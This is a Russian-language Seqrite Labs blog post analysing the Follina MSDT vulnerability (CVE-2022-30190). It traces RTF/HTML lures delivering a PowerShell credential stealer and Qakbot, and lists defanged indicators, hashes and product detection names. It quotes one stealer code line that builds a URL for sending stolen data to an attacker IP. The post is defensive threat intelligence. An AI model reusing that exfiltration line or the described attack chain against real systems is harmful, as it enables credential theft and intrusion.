• Продукция и Услуги
        • облако

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • На Прем

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Платформа

          • Malware Analysis Platform
        • Малый бизнес

          • SOHO Total Edition
        • Услуги

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Кибербезопасность и Data Privacy Awareness
  • Решения
    • BFSI
    • Образование
    • Правительство
    • Здравоохранение
    • ITeS
    • Производство
  • O компании
    • О нас Seqrite
    • Руководство
    • Награды и сертификаты
    • Новости
  • Партнёры
    • Партнерская программа
    • Найти партнера
    • Стать партнером
  • Поддержка
  • Ресурсы
    • статьи
    • Статьи
    • Даташит
    • Сферы деятельности
    • Отчеты об угрозах
    • Руководства
    • точка зрения
    • Понимание Data Privacy
    • Проверьте свой рейтинг риска
    • Диалоги ДПДП
    • Час конфиденциальности
Seqrite Labs Блог
Связаться с отделом продаж Под обстрелом?
  • Продукция и Услуги
        • облако

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • На Прем

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Платформа

          • Malware Analysis Platform
        • Малый бизнес

          • SOHO Total Edition
        • Услуги

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Кибербезопасность и Data Privacy Awareness
  • Решения
    • BFSI
    • Образование
    • Правительство
    • Здравоохранение
    • ITeS
    • Производство
  • O компании
    • О нас Seqrite
    • Руководство
    • Награды и сертификаты
    • Новости
  • Партнёры
    • Партнерская программа
    • Найти партнера
    • Стать партнером
  • Поддержка
  • Ресурсы
    • статьи
    • Статьи
    • Даташит
    • Сферы деятельности
    • Отчеты об угрозах
    • Руководства
    • точка зрения
    • Понимание Data Privacy
    • Проверьте свой рейтинг риска
    • Диалоги ДПДП
    • Час конфиденциальности
Главная  /  Информационная безопасность  / CVE-2022-30190: Уязвимость нулевого дня «Follina» в MSDT эксплуатируется в реальных условиях
CVE-2022-30190: уязвимость нулевого дня «Follina» в MSDT, эксплуатируемая в реальных условиях
10 июнь 2022

CVE-2022-30190: уязвимость нулевого дня «Follina» в MSDT, эксплуатируемая в реальных условиях

Написано Амрута Вагх
Амрута Вагх
Информационная безопасность

30 мая 2022 года в средстве диагностики поддержки Microsoft Windows (MSDT) была обнаружена уязвимость CVE-2022-30190 «FOLLINA», позволяющая удаленно выполнить код нулевого дня, имеющая высокий уровень серьезности (CVSS:9.3).

Этот инструмент MSDT диагностирует проблемы в таких приложениях, как документы Microsoft Office. Первоначальный вектор атаки, например, документы Word, использует функцию удалённого шаблона для загрузки HTML-файла, который затем по протоколу URL вызывает этот диагностический инструмент (MSDT) и выполняет вредоносный код. При этом первоначальные атаки ограничивались Microsoft Word, но в последнее время векторы атак расширились, включив в себя RTF и Outlook.

Эта уязвимость эксплуатируется в реальных условиях, и злоумышленники, успешно воспользовавшиеся ею, могут выполнить произвольный код и установить дополнительные программы. Злоумышленники используют эту уязвимость для распространения бэкдоров, AsyncRAT, Quakbot и другого вредоносного ПО среди потребителей и в различных отраслях по всей Северной Америке и Европе.

Подробный анализ уязвимости:

Первоначальным приложением для вызова инструмента MSDT будет Microsoft Office (Word, Excel, RTF и т. д.).

Рис. Схема потока

Ниже приведён пример RTF-файла под названием «Employment_Agreement_Template». В этих RTF-документах используются объекты OLE.

Рис. Файл RTF с OLE-объекты

При открытии этого документа отображается следующее сообщение:-

После того, как жертва нажимает «Да», по встроенной ссылке http[:]//45[.]76[.]53[.]253/1.html загружается закодированный HTML-файл, как показано ниже:

HTML-документы содержат закомментированные символы «A» в нижней части файла, расположенного ниже кода.

Рис. Закодированные данные в HTML-файле

Встроенный код в HTML-файле вызывает PCWDiagnostic с помощью ms-msdt с параметром IT_BrowseForFile, который включает синтаксис PowerShell. Декодированная часть данных в кодировке Base64:

Рис. Декодированные данные

Этот код останавливает msdt.exe, если он запущен, и подключается к URL-адресу «hXXps [:]//seller-notification [.]live/Zgfbe234dg» и загружает скрипт POWERSHELL.

Эксплойт Фоллины был использован для развертывания Stealer на основе PowerShell. Давайте подробнее рассмотрим его содержание:

Рис. Содержание сценария, часть 1

Скрипт проникает в Appdata/Roaming и пытается украсть данные входа, файлы cookie и т. д. таких приложений, как Firefox, Opera, Yandex, Vivaldi, CentBrowser, Comodo, Chedot, Orbitum, Chromium, Slimjet, Xvast, Kinza, Iridium, CocCoc, AVAST Software, Chrome, Outlook, Thunderbird, NetSarang, Windows Live, FileZilla, MobaXterm, WeChat.

Вредоносное ПО запрашивает реестр, чтобы украсть информацию, связанную со следующими приложениями: Autodesk, MobaXterm, Oray SunLogin RemoteClient, MailMaster, Navicat, WinSCP, Microsoft Office, FTP, RAdmin и т. д.

Рис. Содержание сценария, часть 2

Помимо этого, он также собирает информацию, связанную с машиной:

  • Системная информация (включая имя хоста, информацию об ОС, владельца, информацию о BIOS, зарегистрированного владельца)
    Идентификатор продукта, исходная дата установки, время загрузки системы, производитель системы, модель системы, тип системы, процессор, версия BIOS, региональные настройки системы, часовой пояс, общая физическая память, домен, сервер входа и т. д.)
  • Конфигурация IP (через Ipconfig)
  • Конфигурация рабочей станции
  • Информация об учетных записях пользователей
  • Администраторы локальных групп
  • Версии названия продукта

Файл .zip создается в %temp% и отправляется на URL:

$http_url = «hxxp://45[.]77.156[.]179:443/» + $ip + «———-» + $time1 + «.zip»

$time1 — это временная метка эпохи, рассчитанная

Это также действует как проверка виртуализации.

Давайте рассмотрим еще один пример Quakbot:

Фишинговое письмо с вредоносными HTML-вложениями, загружает файлы архива (.img) (ed63c189b52e4eb663598dc0c3121e05). Этот архив содержит .lnk (76390978f26d3c6d7f799257542796ce), полезную нагрузку qbot (a14d48974eab6839b1238f984b3c28d2) и файл doc (e7015438268464cedad98b1544d643ad).

Рис. Схема потока

Полезная нагрузка qbot в zip-архиве выполняется через .lnk, а файл .doc загружает HTML-файл. Этот .html-файл, в свою очередь, загружает другую полезную нагрузку .qbot, эксплуатируя уязвимость Follina.

Здесь HTML-файл загружается с http[:]//185[.]234[.]247[.]119 и содержит данные, показанные на следующем рисунке:-

Рис. Данные HTML-файла

Этот HTML-код подключается к указанным выше URL-адресам и загружает dll-файл Quakbot (ce86511634b5420332eb6267c0e2ae2e), который затем запускается через regsvr32.exe.

Анализ:

 Этот файл Quakbot представляет собой скомпилированный файл Delphi с зашифрованными данными в разделе .rsrc внутри RCDATA, которые расшифровываются в виртуально выделенной памяти. На рисунках ниже показаны зашифрованные данные и цикл расшифровки.

Рис. Зашифрованные данные 

Рис. Описание цикла

Это расшифровывается в API и 1st файл стадии PE

Теперь поток переходит к первому этапу, который отвечает за внедрение DLL и размещение полезной нагрузки Quakbot в памяти. Для зашифрованных строк выполняется расшифровка RC1, которая выводит список процессов, например, процессов, связанных с антивирусом, и т.д. Если они обнаружены запущенными, полезная нагрузка завершается. На рисунке ниже мы видим проверяемые процессы.

Список проверяемых процессов включает:

Позже он выполняет внедрение процесса в «onedrivesetup.exe»:-

Qbot связан с кампанией «obama186». Ниже представлено изображение, демонстрирующее соединения C2 из «onedrivesetup.exe»:

Методы обхода:

Мы наблюдали, как злоумышленники использовали методы кодирования в начальных векторах атак для обхода обнаружения. Следующие примеры иллюстрируют это.

Рис. Пример № 1

Рис. Пример № 2

Вывод:

Это одна из самых критических уязвимостей нулевого дня за последнее время. Эта уязвимость CVE использует множество методов обхода, не имеет исправления и легко эксплуатируется. После выхода обновления безопасности от Microsoft пользователям следует немедленно устранить её. До этого момента мы рекомендуем организациям быть бдительными и следовать приведенным ниже мерам, чтобы уменьшить поверхность атаки и возможный ущерб. 

Для устранения последствий «Фоллины» следуйте рекомендациям:

 https://blogs.quickheal.com/threat-advisory-cve-2022-30190-follina-severe-zero-day-vulnerability-discovered-in-msdt/

Как Quick Heal защищает своих клиентов?

Современные технологии защиты продукции Quick Heal защищают наших клиентов от фоллиноза.

В нашей поведенческой технологии обнаружена уязвимость Follina под названием “CVE_2022_30190_Follina”. Аналогично, в Seqrite В отношении продукции Hawk Hunt у нас действует политика, которая называется... «QHIR_CVE_2022_30190_Фоллина» для идентификации этой атаки.

Ниже приведены обнаруженные на основе файлов и сети угрозы для Follina:

1. На основе файлов:

  • Бэкдор.Турианец.S28183972
  • Trojan.Qbot.S28211728
  • CVE-2022-30190.46655
  • CVE-2022-30190.46638
  • CVE-2022-30190.46635
  • CVE-2022-30190.46624

2.Сетевые:

  • CVE-2022-30190.RCE!46674
  • CVE-2022-30190.RCE!46675

 

Эксперт предметной области

Теджасвини Сандаполла

Амрута Вагх

 предыдущий постИнформационное сообщение об угрозе: CVE-2022-30190 «Follina» – Серьезная уязвимость нулевого дня...
Следующий пост  CVE-2022-26134: активно эксплуатируемая инъекция Atlassian OGNL Zero-...
Амрута Вагх

Об Амруте Вагх

Амрута — исследователь безопасности в Quick Heal Technologies. Она занимается анализом вредоносных программ, обратной разработкой и поиском актуальных вредоносных программ...

Статьи Амруты Ваг »

Похожие статьи

  • Почему Threat IntelЛьгота — недостающее звено в вашей стратегии кибербезопасности.

    Июль 25, 2025
  • Заманенные и скомпрометированные: разоблачение цифровой опасности медовых ловушек

    17 июня 2025
  • Операция «Синдур» – анатомия цифровой осады

    23 мая 2025
Избранные авторы
  • Seqrite
    Seqrite

    Seqrite является ведущим поставщиком решений в области корпоративной кибербезопасности. Специализируется на...

    Прочитайте больше статей Seqrite
  • Джоти Карлекар
    Джоти Карлекар

    Я страстный писатель, которому нравится создавать контент о новых технологиях и...

    Прочтите другие статьи Джоти Карлекара
  • Бинеш П.
    Бинеш П.

    Я страстный энтузиаст кибербезопасности и преданный писатель. Обладая талантом...

    Читайте другие статьи Бинеша П.
  • Санджай Каткар
    Санджай Каткар

    Санджай Каткар — соуправляющий директор Quick Heal Technologies...

    Читайте другие статьи Санджая Каткара
Темы
склонный (25) Cyber-атака (36) кибер-атаки (58) кибератаки (16) кибератаки (15) Информационная безопасность (340) информационная безопасность (34) Киберугроза (33) кибер-угрозы (51) Данные нарушения (56) нарушения данных (29) Потеря данных (28) предотвращение потери данных (34) data privacy (16) защита данных (34) безопасность данных (19) DLP (50) ДПДП (14) ДПДПА (17) Шифрование (16) для защиты конечных точек (112) Безопасность предприятия (19) Эксплуатировать (13) GDPR (14) вредоносных программ (76) анализ вредоносных программ (14) вредоносная атака (23) МДМ (27) Microsoft (15) MITRE ATT & CK (13) Сетевая безопасность (26) фишинг (30) Ransomware (69) атака ransomware (31) атаки ransomware (31) защита от копирования (16) Seqrite (41) Seqrite Шифрование (27) Seqrite EPS (33) Seqrite Услуги (16) обнаружение угрозы (13) Threat Intelлигенция (20) UTM (34) Уязвимость (16) нулевое доверие (13)
Seqrite Labs

Ведущий поставщик решений по корпоративной ИТ-безопасности, упрощающий защиту конечных точек, данных и сетей с помощью лучших в своем классе решений по предотвращению, обнаружению и реагированию на угрозы по всему миру.

Подробнее о Seqrite

Наши соцсети:

Подпишитесь на нашу рассылку

Будьте в курсе последних тенденций и новостей в сфере кибербезопасности.

Загрузка
Продукция и Услуги
  • облако
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • На Прем
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Платформа
  • Malware Analysis Platform
  • Микро Бизнес
  • SOHO Total Edition
  • Услуги
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Кибербезопасность и Data Privacy Awareness
Ресурсы
  • статьи
  • Статьи
  • Даташит
  • Отчеты об угрозах
  • Руководства
  • точка зрения
  • Понимание Data Privacy
  • Диалоги ДПДП
  • Политика и соответствие
  • Лицензионное соглашение
  • GoDeep.AI
  • SIA
  • Час конфиденциальности
Свяжитесь с нами
  • Зарегистрированные офисы
  • Давайте поговорим о кибербезопасности
Поддержка
  • Техподдержка
  • Загрузка программного обеспечения
  • Автономное обновление
  • Обновление прошивки
  • Обновления
  • Документация
О Нас
  • О нас Seqrite
  • Руководство
  • Награды и признание
  • Новости
Сотрудничайте
  • Партнерская программа
  • Найти партнера
  • Стать партнером
  • Seqrite Сертификаты

© 2026 Quick Heal Technologies Ltd.

Карта сайта Политика конфиденциальности Юридическая информация Политика использования файлов cookie Условия эксплуатации